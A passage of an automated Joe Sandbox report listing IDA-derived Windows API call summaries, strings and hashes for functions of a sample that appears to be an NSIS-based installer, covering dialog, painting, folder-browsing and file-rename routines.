                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                    • String ID: (7B${
                                                                                                                    • API String ID: 590372296-525222780
                                                                                                                    • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                    • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                    • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                                    • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                    • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                    • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                    • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                    • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                    • String ID: (7B
                                                                                                                    • API String ID: 184305955-3251261122
                                                                                                                    • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                    • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                    • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                                    • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                      • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                    • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,76233420,00435000,00000000), ref: 00403B59
                                                                                                                    • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                                    • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                    • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                      • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                    • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                    • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                    • API String ID: 1975747703-1425696872
                                                                                                                    • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                    • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                    • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                    • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                                    APIs
                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                                    • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                    • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                    • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                    • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                    • String ID: N
                                                                                                                    • API String ID: 3103080414-1130791706
                                                                                                                    • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                    • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                    • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                    • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                    • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                    • String ID: F
                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                    • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                    • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                    • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                    • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                    • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                                    • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                      • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                      • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                      • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                      • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                      • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: (7B$A
                                                                                                                    • API String ID: 2624150263-3645020878
                                                                                                                    • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                    • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                    • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                    • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                      • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                      • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                    • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                    • wsprintfA.USER32 ref: 004060B3
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                    • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                      • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                      • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                    • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                    • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                    • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                    • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                      • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                      • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                                    Strings
                                                                                                                    • soft, xrefs: 00403020
                                                                                                                    • Inst, xrefs: 00403017
                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                    • Error launching installer, xrefs: 00402F80
                                                                                                                    • Null, xrefs: 00403029
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                    • API String ID: 2803837635-787788815
                                                                                                                    • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                    • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                    • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                    • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                    • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                    • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                    Strings
                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                    • API String ID: 717251189-730719616
                                                                                                                    • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                    • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                    • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                    • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                    • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                    • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2320649405-0
                                                                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                    • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                    • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                                      • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
